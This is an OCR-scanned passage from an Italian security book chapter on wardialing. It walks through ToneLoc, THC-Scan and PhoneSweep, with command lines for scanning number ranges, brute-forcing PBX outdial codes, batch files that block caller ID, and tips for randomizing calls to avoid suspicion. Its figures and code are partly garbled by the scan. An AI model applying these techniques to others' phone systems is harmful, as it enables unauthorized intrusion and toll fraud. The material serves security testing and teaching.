target; pertanto è opportuno assicurarsi di aver abilitato sulla propria linea 
telefonica il blocco dell’identificazione del chiamante (ovviamente, se siete 
autorizzati, non ci saranno problemi). È importante inoltre tenere presente 
che le chiamate ai numeri verdi possono potenzialmente rilevare il numero 
di telefono del chiamante, indipendentemente dallo stato del servizio di 
identificazione, in quanto il destinatario deve pagare la chiamata. 


Costi accessori 


Infine, se il vostro obiettivo si trova fuori distretto, non dimenticate di considerare le 
tariffe telefoniche interurbane. Preparatevi a difendere questi costi accessori di fron- 
te alla dirigenza quando proponete un test di wardialing per la vostra azienda. 

Ora passeremo a descrivere in dettaglio la configurazione e l'utilizzo dei diversi 
strumenti, in modo che gli amministratori possano allestire e avviare l'attività di 
wardialing il più in fretta possibile. Sappiate, però, che riusciremo solo a scalfire la 
superficie delle funzionalità avanzate offerte da questi programmi: ora più che mai 
vale il consiglio di leggere il manuale. 


Software 


Poiché la maggior parte del wardialing si svolge nelle ore notturne, per evitare di 
interferire con le normali attività lavorative, la possibilità di pianificare con una certa 
elasticità le scansioni e di proseguire dall'ultimo punto di interruzione diventa fon- 
damentale. I programmi freeware ToneLoc e THC-Scan salvano periodicamente 
un’istantanea dello stato dell'intera operazione e la collocano tra i file di dati, sem- 
plificando il ripristino dell'operazione. Inoltre, prevedono semplici funzionalità di 
pianificazione (ora di inizio e di fine) delle attività sull'arco delle 24 ore. Purtroppo, 
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per pianificare le attività su più giornate è necessario affidarsi agli strumenti di pia- 
nificazione e alle procedure batch del sistema operativo. PhoneSweep e Tele- 
Sweep, invece, prevedono la pianificazione completamente automatica, adatta a ge- 
stire le ore di maggiore e di minor traffico. 

Avendo a disposizione numerosi prodotti commerciali con notevoli interfacce grafi- 
che, la domanda che ci si pone è: qual è il software migliore? La risposta, unica seb- 
bene necessariamente relativa alle diverse architetture di rete, può essere riassunta 
in questa frase: dipende dalle conoscenze della persona che effettua il wardialing. 
ToneLoc e THC-Scan sono delle applicazioni eccellenti per l’utente più esperto. En- 
trambe queste applicazioni DOS possono essere eseguite simultaneamente, chia- 
mando diversi modem con la stessa macchina. L'esecuzione del wardialing con 
molti modem sulla stessa macchina è un metodo assai valido per comporre una 
quantità enorme di numeri in un tempo più breve. Sebbene i prodotti commerciali 
come TeleSweep consentano l’impiego di diversi modem, essi tendono a essere più 
lenti e a impiegare più tempo. Inoltre, poiché ToneLoc e THC-Scan operano in am- 
biente DOS, risultano piuttosto antiquati, per quanto riguarda l'interfaccia utente e 
la prontezza di utilizzo, se paragonati agli altri prodotti commerciali: di conseguen- 
za, è necessaria almeno la conoscenza di semplici comandi DOS per trarne il me- 
glio e ottenere risultati più accurati. Infine, per utilizzare queste applicazioni in 
modo efficace, occorre una conoscenza aggiuntiva hardware e software per l’identi- 
ficazione delle linee dati. Quindi, se non è un problema quello di avere a che fare 
con la riga di comando e con la conoscenza di alcune operazioni software, queste 
applicazioni gratuite svolgono il loro lavoro assai egregiamente. 

D'altra parte, quando non si conosce l'ambiente e l'interfaccia DOS, i wardialer 
commerciali, come PhoneSweep e TeleSweep, rappresentano la soluzione migliore, 
grazie sia all’interfaccia grafica intuitiva che facilita l'introduzione di serie di numeri 
telefonici, sia all'impostazione degli intervalli di rilevazione sia alla generazione dei 
rapporti e delle stampe. Tuttavia, entrambe le applicazioni commerciali menzionate 
in questo capitolo si basano su un database per l’identificazione della linea dati i cui 
risultati non sono sempre accurati e richiedono generalmente ulteriori analisi. An- 
che se i rivenditori saranno di avviso differente, normalmente la scansione delle li- 
nee dati è necessaria. Al momento della stesura di questa quarta edizione, la versio- 
ne 4.4 di PhoneSweep viene dichiarata come in grado di identificare fino a 470 si- 
stemi, mentre TeleSweep 3.0 arrivava solo a 151. È comunque più che noto alla co- 
munità del wardialing che le modalità di penetrazione della rete da parte di questi 
prodotti, che prevedono di sottoporre a un modem identificato una sequela di pass- 
word, comportano non pochi problemi. Non si può comunque ribattere niente, per- 
ché scrivere il codice per un attacco in tempo reale che tenga conto di così tante va- 
riabili non è affatto facile. Per essere veramente sicuri dell’affidabilità della penetra- 
zione della rete condotta da questi software è consigliabile verificare i modem for- 
zati con una seconda sorgente, per esempio chiamandoli mediante un software di 
comunicazione come ProComm Plus. 

Infine, se avete una grande serie di numeri da provare e non avete familiarità con i 
messaggi di invio dati che appaiono sullo schermo, potrebbe essere il caso di utiliz- 
zare un prodotto commerciale; d'altra parte, essendo i prodotti come ToneLoc e 
THC-Scan assolutamente gratuiti, potreste pensare di acquisire familiarità anche con 
questi. Ovviamente, potreste provarli entrambi, a seconda delle vostre disponibilità, 
e quindi decidere quale di essi si adatti meglio a voi e al vostro sistema: a nostro av- 
viso, è questo l'approccio più efficace per il wardialing. 
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® ToneLoc 


Diffusione: 9 
Semplicità: 8 
Impatto: 8 
Fattore di rischio: 8 


Uno dei primi e più popolari strumenti per wardialing disponibili è ToneLoc, svilup- 
pato da Minor Threat e Mucho Maas (“ToneLoc” è l'abbreviazione di “Tone Locator”). 
Il sito originale di ToneLoc non esiste più, ma è possibile trovarne diverse versioni sui 
siti underground di Internet dedicati al “phone phreaking”. Come la maggior parte dei 
software di composizione, ToneLoc funziona in ambiente DOS (o in una finestra DOS 
di Windows 9x, NT o Windows 2000 o in un emulatore DOS in UNIX), e negli anni si 
è dimostrato uno strumento efficace e utile sia per gli hacker sia per i responsabili del- 
la sicurezza. Sfortunatamente, i creatori di ToneLoc non si sono mai preoccupati di 
aggiornarlo e nessuno si è fatto avanti per continuare la loro opera. Sebbene un po’ 
datato, ToneLoc continua a distinguersi per efficienza e semplicità di utilizzo, inoltre 
costituisce un carico veramente esiguo per la CPU: l'eseguibile è di soli 46K! 

Per attività di wardialing di base, ToneLoc è facile da configurare e utilizzare; ma 
per utilizzare le funzionalità avanzate sono necessarie attività più complesse. Per 
prima cosa, è necessario eseguire dalla linea di comando un semplice programma 
di utilità di nome TLCFG, che riporta i parametri fondamentali, come la configura- 
zione del modem (porta COM, indirizzo di /O e IRQ della porta), nel file TL.CFG, 
che viene controllato da ToneLoc all'avvio. Potete trovare informazioni dettagliate e 
schermate d'esempio riguardanti la configurazione di TLCFG sul sito sul wardialing 
di Stephan Barnes, all'indirizzo Web http://www.m4phr1k.com. TLCFG.EXE è visi- 
bile nella Figura 8.1. 


('“CA\WINNT\System32\cmd_ exe - ticfg 


t 


i ToneLoc Configuration | 
Files ModenmStrings ‘ModemOptions ScanOptions Colors Quit 
‘ 3 i 


Serial Port 
| Port Address 
| Port IRQ 
Baud Rate 
| Use FOSSIL 
{ Command Delay 
Character Delay 
{ Response Wait 
Ignore CD line 
Ignore CTS line 
| Ignore Unknowns 


IRQ for serial port <0 for default) Fi for help 


Figura 8.1 


TLCFG.EXE consente di definire i parametri di configurazione del modem che verrà utilizzato 
da ToneLoc per il wardialing. 


332 Capitolo 8 


Fatto questo, è possibile lanciare ToneLoc dalla linea di comando, specificando l’in- 
tervallo di numeri da comporre, i file di dati in cui riportare i risultati ed eventuali 
opzioni, come mostrato nell'elenco seguente: 


ToneLoc [DataFile] /M:[Mask] /R:[Range] /X:[ExMask] /D:[ExRange] 
/C:[Config] /#:[Number] /S:[StartTime] /E:[EndTime] 
IH:[Hours] /T /K 


[DataFile] - File to store data in, may also be a mask 
[Mask] - To use for phone numbers Format: 555-XXXX 
[Range] - Range of numbers to dial Format: 5000-6999 
[ExMask] - Mask to exclude from scan Format: 1XXX 
[ExRange] - Range to exclude from scan Format: 2500-2699 
[Config] - Configuration file to use 
[Number] - Number of dials to make Format: 250 
[StartTime] - Time to begin scanning Format: 9:30p 
[EndTime] - Time to end scanning Format: 6:45a 
[Hours] - Max # of hours to scan Format: 5:30 
Overrides [EndTime] 
/T = Tones, /K = Carriers (Override config file, '-' inverts) 


Come vedremo, THC-Scan prevede parametri molto simili. Nell'esempio che segue, 
ToneLoc viene utilizzato per comporre i numeri da 555-0000 a -9999, registrando le 
eventuali portanti (carrier) nel file “test”. Nella Figura 8.2 viene mostrato il funziona- 
mento di ToneLoc: 


toneloc test /M:555-XXXX /R:0000-9999 


= C:\WINNTXSystem32\cmd_ exe - toneloc test 7M:555-X0X /R:0001-9999 
Activity Log 


20:29:29 » 
ToneLoc v1.109 ‘Sep 29 1994) 


20:29:29 


20:29:29 
20:29:29 


Figura 8.2 


ToneLoc started on 07-May-99 
Using COM2 ‘16459 UART> 
Data file: TEST .DAT 
Config file: 
Log file: 
Mask used: 
Range used: 
Scanning for: 
Initializing Modem ... Done 
555-2544 - Busy 
- Carrier 

UMB 


555_4074 
36 


a 

us y 
Busy 
Girl 
Tone 

555-29006 


BUSY 

ATDT 555-1809 
OK 

ALDI 555-5935 
ATDIT 555-9006 


Statistics 
Started: 20:29:29 Ring: 
Current: 20:31:39 Secs: 
Max Dials: 9999 
Dials/Hour: 278 ETA: 


D/ 8 
7/35 
35:49 


ToneLoc vi.i19 Sep 29 1994) by Minor Threat & Mucho Maas 
Initialized: 19200 baud, rx buffer = 512 <164508 UART) 


Un'immagine di ToneLoc durante la scansione di un intervallo esteso di numeri telefonici 
alla ricerca di portanti, ovvero di segnali elettronici generati da un Modem remoto. 
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L'esempio seguente compone il numero 555-999, aspetta un nuovo segnale e prova 
ogni potenziale combinazione di tre cifre (xxx) sui numeri telefonici composti suc- 
cessivamente, fino a ottenere la parola chiave per poter effettuare chiamate in uscita 
dal centralino: 


toneloc test /m:555-9999Wxxx 


Il parametro di attesa (wait) è utilizzato per verificare la presenza di centralini che 
permettono all'utente di collegarsi e digitare un codice per ottenere un nuovo se- 
gnale di libero, che consente di effettuare chiamate in uscita dal centralino. Tone- 
Loc riesce a indovinare codici fino a quattro cifre. È sufficiente per convincervi a eli- 
minare la possibilità di effettuare chiamate da remoto usando il centralino, o alme- 
no a impostare codici di più di quattro cifre? 

Il programma di utilità TLCFG può essere usato per modificare le impostazioni pre- 
definite, così da personalizzare ulteriormente le chiamate. ToneLoc crea automati- 
camente un file tone. log che contiene tutti i risultati dello scan: per ogni numero, 
questo file contiene la data e l'ora in cui è stato chiamato, nonché i risultati della 
chiamata. Il file tone.log è importante, perché dopo il primo passaggio i numeri 
non raggiungibili o occupati possono essere riprovati. 

ToneLoc crea anche un file found. log che cattura tutte le linee dati trovate e i se- 
gnali di “carrier detect” rilevati nel corso delle operazioni di scan. Questo file 
found.log si trova nella directory FILES delle utility di TL.CFG, e contiene i mes- 
saggi di invito dei modem che hanno risposto. Spesso i sistemi di tipo dial-up non 
sono configurati in modo ottimale per quanto riguarda la sicurezza, e rivelano le in- 
formazioni della linea dati riferite al sistema operativo, all'applicazione o all’hard- 
ware. Questi messaggi contengono informazioni particolarmente attraenti che pos- 
sono essere usate in seguito per personalizzare gli attacchi contro le linee dati iden- 
tificate. Con il programma di utilità TLCFG, si possono specificare i nomi di questi 
file di log oppure lasciare le impostazioni predefinite. 

ToneLoc dispone di molte altre caratteristiche interessanti che è opportuno lascia- 
re a un'attenta lettura del manuale utente (TLUSER.DOC): esso permette comun- 
que di eseguire semplici operazioni di wardialing con la configurazione che ab- 
biamo illustrato. 


in modo da avere in un unico file entrambe queste informazioni, semplifi- 


ù È consigliabile redirezionare i file found. log e tone. log in uno stesso file, 
cando così la loro visualizzazione. 


File batch per ToneLoc 


Di default, ToneLoc è già in grado di scansionare un intervallo di numeri, In alterna- 
tiva potete creare dei semplici file di batch per importare un elenco o serie di nume- 
ri che saranno composti tramite la riga di comando di ToneLoc. Il vantaggio di ri- 
correre a questa tecnica, a fronte dell'uso dell'opzione di configurazione predefinita 
(il file DAT), è che il modem viene reinizializzato dopo aver composto ogni nume- 
ro. Perché questo è così importante? Considerate di effettuare un wardialing su 1000 
numeri in orario non di punta, generalmente di notte: se per caso il modem si bloc- 
casse su un determinato numero, gli altri non riuscirebbero a essere composti e in 
questo modo si perderebbero molte ore. Nella stessa situazione, se si utilizzasse un 
file batch e il modem si bloccasse sullo stesso numero, ToneLoc si limiterebbe ad 
attendere un certo periodo di tempo prima di disconnettersi, perché ad ogni nume- 
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ro ToneLoc viene riavviato: infatti, se il modem crea dei problemi il batch passerà 
all'esecuzione della riga di codice successiva, che provvede a chiamare un altro nu- 
mero. Siccome ToneLoc viene eseguito su ogni nuovo numero, ogni riga di codice 
del batch lo riavvia e reinizializza il modem: questa modalità garantisce un wardia- 
ling chiaro e senza perdite di tempo, inoltre elimina la possibilità di blocco dei mo- 
dem. Per di più, questa modalità non richiede alcun tempo di elaborazione aggiun- 
tivo. La frazione di millisecondo che richiede lo spostamento alla riga seguente del 
file batch non è apprezzabilmente maggiore della frazione di millisecondo che oc- 
corre a ToneLoc per ripetere la composizione del numero. Stiamo cercando di 
ricreare qualcosa di simile a quanto illustrato (e via di seguito, fino al completamen- 
to della serie di numeri); ecco un esempio delle prime undici righe di WAR1.BAT: 


toneloc 0000wari.dat /M:*6718005550000 > nul 
toneloc 0001wari.dat /M:*6718005550001 > nul 
toneloc 0002wari.dat /M:*6718005550002 > nul 
toneloc 0003war1.dat /M:*6718005550003 > nul 
toneloc 0004wari.dat /M:*6718005550004 > nul 
toneloc 0005wari.dat /M:*6718005550005 > nul 
toneloc 0006wari.dat /M:*6718005550006 > nul 
toneloc 0007wari.dat /M:*6718005550007 > nul 
toneloc 0008wari.dat /M:*6718005550008 > nul 
toneloc 0009war1i.dat /M:*6718005550009 > nul 
toneloc 0010wari.dat /M:*6718005550010 > nul 


Ogni riga di questo file batch avvia l'applicazione toneloc, crea un file con esten- 
sione .dat, utilizza l'opzione nativa di ToneLoc /M per visualizzare la maschera del 
numero (che sarà a sua volta un numero), attiva il blocco dell’identificazione del 
chiamante (*67), compone il numero e con >nul evita di mostrare a video il risulta- 
toi dell'esecuzione del comando. 

Tutto qui: e il vostro wardialing risulterà praticamente esente da errori. C'è ancora 
un parametro di TLCFG di cui tenere conto, se utilizzate la modalità batch: se, nella 
finestra di dialogo ScanOptions dell’utility TLCFG, cambiate in N il parametro Save 
.DAT files, i file .DAT non verranno salvati. In effetti, i file .DAT non servono, quindi 
occuperebbero inutilmente spazio su disco. La ricorrenza dell'istruzione .DAT in 
ogni riga del file batch di esempio appena visto è dovuta al fatto che ToneLoc ne ha 
bisogno per poter funzionare correttamente. Altre considerazioni importanti che 
possono essere fatte riguardano, per esempio, la costruzione di un file batch in cui i 
numeri non vengono composti in sequenza. Di default, l’utility TLCFG imposta la 
scansione dei numeri in ordine casuale, mediante un'opzione della finestra di dialo- 
go ModemOptions: siccome, utilizzando il file batch, viene esaminato un solo nu- 
mero alla volta, per ottenere l'effetto casuale bisognerà mescolarne in qualche 
modo le righe di codice. Molti software per fogli di calcolo sono dotati di routine di 
randomize, che provvedono a mescolare una serie di numeri. Altre considerazioni, 
come la randomizzazione dell'esecuzione, potrebbero risultare importanti: alcune 
compagnie telefoniche dispongono oggi di centralini “intelligenti”, oppure di filtri 
che rilevano le composizioni di numeri telefonici di questo tipo e possono rendervi 
sospetti. La randomizzazione può anche aiutarvi a distribuire il wardialing nell’arco 
della giornata e a evitare che l'azienda, obiettivo della vostra azione, si insospettisca 
per un numero così elevato di chiamate. Gli scopi principali della randomizzazione 
sono quelli di evitare di generare dei sospetti e di non disturbare troppo un distretto 
telefonico. 


Ò”W”' 
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Per costruire il file precedente (per un campione di 2000 numeri), si utilizza un 
semplice programma QBASIC che crea un file batch. Eccone un esempio: 


'QBASIC Batch file creator, wrapper Program for ToneLoc 
'Written y M4phr1ik, www.m4phrik.com, Stephan Barnes 


OPEN "warl.bat" FOR OUTPUT AS #1 
FOR a = 0 to 2000 


ag = STRS(a) 

a$ = LTRIM$(a$b 

'le 9 righe che seguono lavorano con le cifre ithru10 10thru100 
100thru10000 

'dopo 1000 non avviene il troncamento 

IF LEN(a$) = 1 THEN 

ag = "000" + a$ 

END IF 

IF LEN(a$) = 2 THEN 

ag = "00" + a$ 

END IF 

IF LEN(a$) = 3 THEN 

as = "0" + a$ 

END IF 

aa$ = a$ + "wart" 

PRINT aa 

PRINT #1, "toneloc" + aa$ + ".dat" + " /M:*671800555" + a$ + " > nul" 
NEXT a 

CLOSE #1 


Con questo esempio, si crea un file batch pronto per essere eseguito nella directory 
che contiene gli eseguibili di ToneLoc. Per creare il file batch potete utilizzare qual- 
siasi linguaggio: QBASIC, del quale ci siamo serviti nell'esempio, è uno dei più sem- 
plici. 


DI THC-Scan 


Diffusione: 9 
Semplicità: 8 
Impatto: 8 
Fattore di rischio: 8 


Il vuoto lasciato dalla scomparsa di ToneLoc è stato colmato da ‘THC-Scan, sviluppato 
da van Hauser del gruppo tedesco di hacker The Hacker's Choice (http: // 
wwW.thehackerschoice.com). Analogamente a ToneLoc, THC-Scan viene configura- 
to ed eseguito da DOS, da una shell DOS in Win 9x, dalla console di Windows 
NT/2000, o in un emulatore DOS sotto UNIX. 

Per prima cosa è necessario generare un file di configurazione (.CFG) per THC-Scan 
con il programma TS-CFG, che offre un maggiore controllo sulle funzionalità rispet- 
to ai limiti di TLCFG per ToneLoc. Anche in questo caso, il grosso della configura- 
zione è piuttosto semplice, ma una buona conoscenza del funzionamento delle 
porte COM su PC può tornare utile per impostazioni non standard. Le opzioni più 
diffuse sono riportate nella tabella a pagina seguente. 
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COM IRQ Porta I/O 
I 4 3F8 
- 3 2F8 
3 4 3E8 
4 6) 2E8 


In caso di necessità, il programma di utilità MOD-DET, compreso in THC-Scan, per- 
mette di risalire ai valori effettivi da utilizzare per questi parametri (potete ignorare 
eventuali errori riportati da Windows): 


MODEM DETECTOR v2.00 (c) 1996,98 by van Hauser/THC 
<vh@reptile.rug.ac.be> 


Get the help screen with : MOD-DET.EXE ? 


Identifying Options... 
Extended Scanning : NO 
Use Fossil Driver : NO (Fossil Driver not present) 
Slow Modem Detect : YES 
Terminal Connect : NO 
Output Filename î <none> 


Autodetecting modems connected to COM 1 to COM 4... 
COM 1 - None Found 
COM 2 - Found! (Ready) [Irq: 3 _ BaseAdress: $2F8] 
COM 3 - None Found 
COM 4 - None Found 


1 Modem(s) found. 


Una volta creato il file .CFG di configurazione, si può procedere con il wardialing. 
La sintassi del comando THC-Scan è molto simile a quella di ToneLoc, con parec- 
chie aggiunte. (L'elenco delle opzioni è troppo lungo per essere riproposto qui, ma 
è disponibile nella quarta parte del manuale THC - SCAN.DOC compreso nella distribu- 
zione.) Anche come presentazione, THC-Scan assomiglia molto a ToneLoc, come si 
può vedere nella Figura 8.3. 

La programmazione a livello quotidiano delle attività di wardialing è un processo ma- 
nuale che utilizza i parametri /S e /E per specificare rispettivamente l'ora di inizio e 
fine e sfrutta funzionalità specifiche del sistema operativo, come l'utilità di pianifica- 
zione AT in Windows, per riavviare le scansioni all'orario desiderato ogni giorno. Di 
solito noi riportiamo i parametri di THC-Scan in un semplice file batch richiamato da 
AT. A questo proposito, è importante ricordare che THC-SCAN.EXE cerca il file .CFG 
solo nella directory corrente, a meno che non si specifichi diversamente con il para- 
metro /!. Dato che AT esegue i comandi in %systemroot%, THC- SCAN. EXE non sarà in 
grado di trovare il file .CFG, a meno che non si fornisca un riferimento assoluto, come 
mostrato nel prossimo esempio, dove troviamo il file batch the. bat: 


@RE@REcho off 

rem assicuratevi che thc-scan.exe sia nel path 

rem path assoluto al file .cfg deve essere specificato con lo switch /! se 
eseguito da 

rem AT scheduler 
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VWINNTxXSystem32\cmd.exe - thc-scan test /M:555-)0CX /R:1500-9999 


TIME STATISTIC. LOG WINDOW 
Start » 22:11:21 Done 3 1 22:11:21 Auto Saving DAT File ... 
» 22:13:11 To Do : 8499 22:11:21 UnDialed : 9998 
» 66:94:41 22:11:21 Excluded : 1500 
Dials/H: 229 22:11:21 : 
Timeout » 11/50 22:11:21 8500 
Rings » D/6 i 22:11:21 555KKKX 
È 22:11:21 9g 1500-9999 
22:11:21 Carrier 
22:11:21 undialed, busy 
22:11:21 Scan started 
22:11:21 5554215 Busy(8) 25sec 
22:11:47 5555824 guannetint.: BusyC@ 
>) 25sec Carrier 25se 
pa ol 13 5551807 UMB<e> isec Carrier 


da ti2:16 5555140 Busy(0) 25sec Carrie 


r_ 25sec 
22:12:42 5555578 intenti Redialing 
OK (0) 7?sec Carrier 9se 
ATDT5555578 22: vidg 51 5555578 Girlc@) YZsec Carrier 
NO CARRIER 7se 
ATDI5555869 22:13:08 5555869 


| 555-5824 CARRIER 


1 
a 
1 
1 
0 | 
5 
a 
.] 


2ndary 
MODEM WINDOW 


Figura 8.3 
THC-Scan e il wardialing . 


rem prima di rieseguire uno scan, cambiare la directory con il file .DAT 
appropriato 

rem file e cancellate l'argomento /P: 

C:\thc-scan\bin\THC-SCAN.EXE test /M:555-xxxx /R:0000-9999 
{t:C:\thc-scan\bin\THC-SCAN.CFG /P:test /F /S:20:90 /E:6:00 


Quando si avvia questo file batch, THC-Scan aspetta le 20, quindi inizia a comporre 
per fermarsi alle 6 di mattina. Per pianificare questo file batch in modo che venga 
eseguito tutti i giorni è sufficiente il seguente comando AT: 


at 7:58P /interactive /every:1 C:\thc-scan\bin\thc.bat 


THC-Scan identificherà il file .DAT corretto e riprenderà il lavoro dal punto in cui è 
stato interrotto la notte precedente, fino a esaurire i numeri da analizzare. Ricorda- 
tevi di eliminare la pianificazione del job utilizzando at /delete una volta comple- 
tato il giro. 

Se vi servite di più modem o più client in rete per effettuare il wardialing, van Hau- 
ser ha incluso un file batch di esempio (NETSCAN. BAT) nell'archivio THC-MISC.ZIP 
compreso nella distribuzione. Con piccole modifiche illustrate nella seconda parte 
di THC-SCAN. DOC, questa procedura batch è in grado di ripartire automaticamente 
un dato intervallo di numeri telefonici creando file .DAT distinti, che possono esse- 
re utilizzati su ciascun modem o client. Per impostare THC-Scan per l’uso di più mo- 
dem, seguite questo esempio. 

1. Create una directory distinta per ogni modem, ognuna contenente una co- 
pia di THC- SCAN. EXE e il file .CFG corrispondente al modem da utilizzare. 


2. Modificate NETSCAN. BAT secondo quanto specificato in THC - SCAN. DOC. Assi- 
curatevi di specificare il numero di modem disponibile con il comando 
"SET CLIENTS=" nella sezione [2] di NETSCAN. BAT. 
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3. Utilizzando la copia di THC-SCAN.EXE nel percorso corrente, eseguite net - 
scan.bat [maschera di composizione] [numero dei modem]. 


4. Copiate i file .DAT generati nella directory di THC-Scan corrispondente a 
ogni modem. Per esempio, se avete eseguito "netscan 555-XXXX 2" per 
utilizzare due modem, copiate il file 2555XXXX. DAT risultante nella directory 
relativa al modem numero 2 (per esempio, \thc-scan\bin2}. 

Durante la scansione per identificare le portanti (carrier), THC-Scan è in grado di in- 
viare ai modem che rispondono alcune stringhe specificate nel file .CFG. Questa 
opzione può essere configurata con l'impostazione “Carrier Hack Mode” di TS-CFG. 
Per specificare le stringhe si utilizza l'opzione Nudge. L'impostazione predefinita è: 


(dove *- è una pausa, e “M un ritorno a capo). Essa sembra funzionare piuttosto bene, 
ma se vi sentite ispirati potete adattarla all'obiettivo specifico che state affrontando. 

Al termine della scansione bisognerebbe analizzare i vari log. Una delle funzionalità 
più interessanti di THC-Scan è la possibilità di catturare in un file di testo le richieste 
provenienti dai terminali remoti. Purtroppo, la gestione dei dati dipende molto da 
input manuali da parte dell’utente, e il wardialing può dar luogo a enormi quantità di 
dati da esaminare, tra cui gli elenchi dei numeri composti, delle portanti trovate, dei 
tipi di sistema identificati, e così via. THC-Scan riporta tutte queste informazioni in tre 
tipi di file: un file .DAT delimitato, un file .DB opzionale, che può essere importato in 
qualsiasi database che rispetti lo standard ODRC (l'opzione deve essere attivata con il 
parametro /F), e una serie di file di testo .LOG contenenti gli elenchi dei numeri oc- 
cupati, delle portanti trovate e dei prompt del terminale, Il file delimitato .DB può es- 
sere rielaborato da qualsiasi strumento di gestione di database, ma non contiene le ri- 
sposte ottenute dalle portanti identificate; l'associazione con i prompt del terminale 
registrati nel file CARRIERS. LOG avviene manualmente. Non si tratta di un ostacolo in- 
sormontabile, visto che è spesso necessario un certo livello di analisi manuale delle ri- 
chieste dei terminali per proseguire nell'identificazione, ma il processo di ricostruzio- 
ne di un report completo contenente i risultati chiave può diventare noioso, specie 
quando la scansione è estesa a grandi blocchi di numeri telefonici. 

Il problema si fa più concreto in caso d'impiego di più modem. Come abbiamo vi- 
sto, in questo caso è necessario configurare istanze di THC-Scan distinte, una pet 
ogni modem disponibile, e ripartire manualmente tra i vari modem i blocchi di nu- 
meri da analizzare. Il programma di utilità DAT - MERGE . EXE, compreso in THC-Scan, 
è in grado di riunire i file .DAT risultanti, ma i log delle risposte devono essere ge- 
stiti ancora manualmente. 


® PhoneSweep 


Diffusione: 9 
Semplicità: 4 
Impatto: 5 
Fattore di rischio: 5 


Se vi sembra che THC-Scan richieda molto lavoro manuale, allora PhoneSweep fa 
per voi (PhoneSweep, ora alla versione 4.4, è commercializzato da Sandstorm En- 
terprises, http://www.sandstorm.net). Mentre finora abbiamo dedicato molto 
tempo alla descrizione dell’impostazione e dell'utilizzo degli strumenti freeware per 
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wardialing, la presentazione di PhoneSweep sarà molto più breve, soprattutto per- 
ché c'è poco da dire che non sia già evidente nell’interfaccia utente, come mostrato 
nella Figura 8.4. 


Pesi PhoneSweep 4.4 Add ne Number ; 


Figura 8.4 


L'interfaccia grafica di PhoneSweep rappresenta un enorme passo in avanti rispetto ai wardialer 
freeware e offre una serie di funzionalità che semplificano l'utilizzo e ne aumentano l'efficienza. 


Le caratteristiche principali che fanno emergere PhoneSweep rispetto alla concor- 
renza sono la semplicità dell'interfaccia grafica, la pianificazione automatica, l’anali- 
si delle portanti, il supporto per più modem in parallelo, e le funzioni di reportisti- 
ca. Per la composizione degli intervalli di numeri (detti profile) vengono utilizzati 
tutti i modem disponibili, fino al numero massimo supportato dalla versione o dalla 
configurazione correntemente utilizzata. La configurazione di PhoneSweep per la 
composizione durante le ore lavorative (Business Hours) e non (Outside Hours), 0 i 
week-end, o una composizione delle tre, è decisamente semplificata, come dimo- 
stra la Figura 8.5. L'orario di lavoro può essere definito dall'utente nella scheda Op- 
tions/ Time. PhoneSweep continua a comporre i numeri negli intervalli specificati 
(solitamente durante le ore non lavorative e nei fine settimana), fermandosi negli al- 
tri (per esempio, durante le ore lavorative), o in caso di “Blackout” definiti in Op- 
tions/Time, e riprendendo dal punto di interruzione fino all'esaurimento dei numeri 
di telefono e/o al completamento dell'analisi dei modem identificati (se richiesta). 
PhoneSweep è in grado di riconoscere automaticamente 470 differenti marche e mo- 
delli di dispositivi di accesso remoto (l'elenco completo è disponibile all'indirizzo ht - 
tp://ww.sandstorm.net/products/phonesweep//sysids.shtml). Per farlo con- 
fronta le stringhe di testo o binarie ricevute dal sistema target con quelle contenute in 
un database di risposte conosciute. Questo significa che se il sistema è stato persona- 
lizzato in qualche modo, PhoneSweep potrebbe non riuscire a identificarlo. 

Oltre al riconoscimento delle portanti standard, PhoneSweep è in grado di effettua- 
re un attacco basato su un dizionario contro i modem identificati. Nella directory 
dell’applicazione è presente un semplice file contenente nomi utente e password 
(separati da tabulazioni) che viene dato in pasto ai modem che rispondono. Se il si- 
stema riattacca, PhoneSweep richiama e continua fino a raggiungere il fondo 
dell'elenco (fate attenzione ai sistemi di inibizione automatica degli account se do- 
vete verificare la sicurezza dei vostri server di accesso remoto). Sebbene questa ca- 
ratteristica sembri garantire a PhoneSweep l’accesso alla rete, diverse prove di for- 
zatura hanno prodotto falsi risultati positivi: è dunque consigliabile verificare sem- 
pre i risultati ottenuti utilizzando una procedura differente, per esempio connetten- 
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i PhoneSweep 4.4 - BOSTON_OFFICE1_JUN200/ 


Figura 8.5 


| parametri per la pianificazione di PhoneSweep sono semplici e consentono 
di adattare facilmente il funzionamento del programma alle proprie esigenze. 


dovi al dispositivo in questione utilizzando un semplice software di comunicazione 
tra modem. 

Un'altra utile caratteristica di PhoneSweep è la capacità di riportare in un file i risul- 
tati delle chiamate effettuate su tutti i modem disponibili, che elimina i problemi (ti- 
pici dei tool freeware) legati alle procedure di ricerca manuale di tali informazioni 
su più file di testo o alla raccolta e all'importazione di dati aventi formati diversi 
all’interno di fogli di calcolo. A questo scopo sono disponibili diverse opzioni. An- 
che per la personalizzazione dei report sono disponibili moltissime opzioni, c'è solo 
l'imbarazzo della scelta. In base a come il report viene personalizzato, presenta 
un'introduzione contenente informazioni realmente utili, riepiloghi operativi e tec- 
nici delle attività e dei risultati, tabelle di statistiche, le risposte ottenute dai modem 
identificati (Appendice A, opzionale), e la “tassonomia” del blocco di numeri telefo- 
nici analizzato (Appendice B, anch'essa opzionale), il tutto salvato in un unico file 
in formato RTF (Rich Text Format). La Figura 8.6 riproduce una parte di un tipico 
report di PhoneSweep. 

Ovviamente, la differenza principale tra PhoneSweep e i suoi concorrenti freeware 
è il costo. AI momento della stesura di questa edizione sono disponibili diverse ver- 
sioni di PhoneSweep, acquistabili sul sito Web di PhoneSweep http://www. sand- 
storm.net. Il rispetto dei vincoli di licenza è garantito dall'uso di una chiave hard- 
ware che si collega alla porta parallela, in mancanza della quale non è possibile in- 
stallare il software. A seconda del costo del lavoro necessario per installare, confi- 
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Executive Summary of PhoneSweep Scan 


Profile Name: BOSTON_OFFICE_1_AUG2001, 
BOSTON OFFICE 2 AUG2001, 
BOSTON_OFFICE_3_AUG2001 


Report Generated: Friday, August 24 2001 13:53:06 


Time of First Call: Monday, August 06 2001 15:06:53 
Time of Last Call: Monday, August 06 2001 17:51:00 


Elapsed Time During Scan: 2 hours, 45 minutes, 53 seconds 


Phone Numbers Assignedto Dial 74 
Number of calls made: 176 


Phone Numbers Dialed using Single Call DetectMé: 74 
Phone Numbers Dialed using Data-onty Mode: 74 
Phone Numbers Dialed using Fax-only Mode: 68 


Phone Numbers Checkedfor Data: 74 
Phone Numbers Checked for Fax: 68 


Search for modems completed: 100.0% 
Search for fax machines completed: 919% 
Username/password guessing completed: —0.0% 


Modems found: 22 
Systems compromised: n/a 


